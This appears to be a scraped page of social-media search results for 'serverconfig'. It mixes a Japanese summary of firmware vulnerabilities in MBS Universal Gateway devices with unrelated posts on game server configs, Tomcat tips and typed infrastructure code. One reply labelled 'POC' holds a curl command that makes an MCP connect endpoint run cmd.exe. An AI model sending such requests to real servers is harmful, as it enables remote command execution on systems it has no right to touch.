Filter
Exclude
Time range
-
Near
MBS GmbHの産業用通信機器「Universal Gateway」で複数の脆弱性が見つかり、認証不要での管理者アクセス取得やroot権限の奪取につながる恐れがあることが公表された。影響を受けるのはファームウェアV6_0_0_5以前を搭載する複数の製品で、修正版への更新が推奨されている。 最も深刻な問題はCVE-2026-35075で、ファームウェアイメージ内に埋め込まれたデフォルトパスワードに起因する。認証されていないリモート攻撃者がファームウェアからハードコードされたパスワードを取得し、その認証情報を用いて管理者権限でデバイスへアクセスできる可能性がある。 また、CVE-2026-35085、CVE-2026-35084、CVE-2026-35083として追跡される複数のスタックバッファオーバーフロー脆弱性も報告された。これらはgdv-serverconfigやdali-devconfigなどの内部Web設定機能に存在し、ユーザー権限を持つ攻撃者が悪用した場合、root権限でシステムへのアクセスを取得できるという。さらに、関連するパストラバーサルの問題により、機密ログファイルを不正に取得される可能性もある。 このほか、複数のCGI処理経路で入力検証が不十分なことから、認証済みユーザーによる任意ファイル削除が可能となる脆弱性も確認された。これにより、システムやサービスの動作に影響を与える恐れがある。 MBS GmbHは対策として、影響を受ける製品をファームウェアV6_0_0_7へ更新するよう案内している。 securityonline.info/mbs-univ…
1
1,025
Replying to @zoomeye_team
POC curl http://x.x.x.x/api/mcp/connect --header "Content-Type: application/json" --data "{\"serverConfig\":{\"command\":\"cmd.exe\",\"args\":[\"/c\", \"calc\"],\"env\":{}},\"serverId\":\"mytest\"}"
1
1
31
1,590
We're going in the same direction but we're using a bit different route: we started extending IaC with typed connections between services. For example - if you declare in your app that you want to consume API of another app, for example you say: case class ServerConfig( productServiceRef: OpenApiServiceReference[ProductsEndpoints.type] ) derives JsonReader then in your code you can do: lazy val productService = config.productServiceRef.toRequestThrowErrors and then val request = productService.getNutritionInfosEndpoint(productIds) val productNutritionList = request.send(backend).body and this will mark your service as impossible to deploy without providing a reference to service that actually serves a matching API in infra code: val recipesApp = RecipesService("recipes-app", RecipesServiceArgs( // ... runConfig = RecipesServerConfig( productService = productApp.asServiceRef[example.products.ProductsEndpoints] ) ) ) These infra entities get generated based on the shapes of what the service code demands and the metadata gets compiled into artifacts so you can even store jars in artifactory or docker images in a registry and they will still get typechecked at deployment compilation time. Automatic resolution of policies is coming after this typed cross-service interface checking work is done but the true end goal for us is to have end-to-end typechecked cloud systems. I'm writing a blogpost on this as we speak. Should I notify you when it's done?
3
158
2025年10月12日時点での進捗 •ユーザーリクエストとは別に題名を入力してから会話を開始するフローに変更し NEWChat表示から新フローへ切り替え •UI UXを総見直しし DrawerとChatの境界を縦セパレーターで可視化し 角丸とマテリアルをiOS26のLiquid Glassガイドに合わせて更新 •ヒットターゲットを拡大し 当たり判定を制御 •一時チャットシートを追加 •設定メニューの入口を一箇所に統一 •新規チャットが反応しない不具合を修正 •Drawerを閉じる際に左上へズレる挙動を修正 •バー内スクロールの手触りを調整 •ServerConfigを整理し NGROKのベースURLを固定 •URL正規化でエンドポイント生成を安全化 動画はリクエスト送信後LLMからの回答までの時間を編集でカットしているため実際の応答速度ではありません。
2
4
1,980
Replying to @efi_aup @jAb_aim
スクロール使用をトリガーとして何らかのpluginか外部ツールでserverconfigを使用可能な数値に上書している可能性が高いと考えています もしくは、メタいですが毎回継承前にカットを挟んでいることから、戦利品紹介後に手動でserver configを編集しているという可能性もあります
4
347
When PHP wants to relive the 90s, can .htaccess be the disco ball that stops it from caching? Source: devhubby.com/thread/how-to-p… #ServerConfig #Internet #WebDesign #TechSupport #htaccess #programminglanguage
4
8
21
ATM10のサーバーからログアウトした状態でもチャンクを読み込ませる場合は world/serverconfig/ftbchunks-world.snbtをforce_load_mode: "always"に書き換える これにたどり着くのにすごい時間かかった・・・
3
100
14 Jul 2025
Log serverconfig settings not compatible with consoles fix this shit i’ve been using this since the servers came out on console and it wasn’t a problem even once
2
72
🔥 Take control of Tomcat! This configuration guide for server.xml covers all the essentials you need to succeed. #ServerConfig buff.ly/41Yl3d2

5
28
1,927
🛠️ Tomcat Tip: Unlock the power of server.xml! Learn how to configure ports, connectors, and resources effectively. #JavaWeb #ServerConfig buff.ly/41Yl3d2

3
15
1,306
simple voice chat導入で積んでいるというか、説明動画で紹介されている方法で進めていきたいのですが、serverconfigに存在してなかったり。 ポート開放もしないといけないようですがそこまで行ってないw 現状普通のマイクラです。 #ひらいけ
1
9
115
15,630
Build a server with us in 30 seconds. Why build your device, when Curvature can do it for you? To learn more about our hardware configuration services, visit: lnkd.in/gFFT24QD #hardwareconfiguration #server #serverconfig
4
1,670
Pra resolver o bug a unica solução foi apagar a serverconfig. Oq a princípio nn parecia problema pra nenhum mod, menos o pixelmon... Aparentemente tudo é salvo na parte do save do mundo, mas os pokés e as missões ficam nas configs ;-;
2
50
PalworldのServerConfigにUNKOって書いてあるの好き
2
260
🤖 Tomcat enthusiasts, unite! Explore a practical example of tomcat-users.xml customization to manage users and roles effortlessly. 🧙‍♂️ #JavaDev #ServerConfig buff.ly/3S6lQD7

1
4
1,694
Ich hege begründbare Zweifel, dass Mikro und Jörn heute bei der @polizeiberlin für euch im Dienst sind. Hey, habt ihr eure Serverconfig wieder in Ordnung gebracht?
1
4
438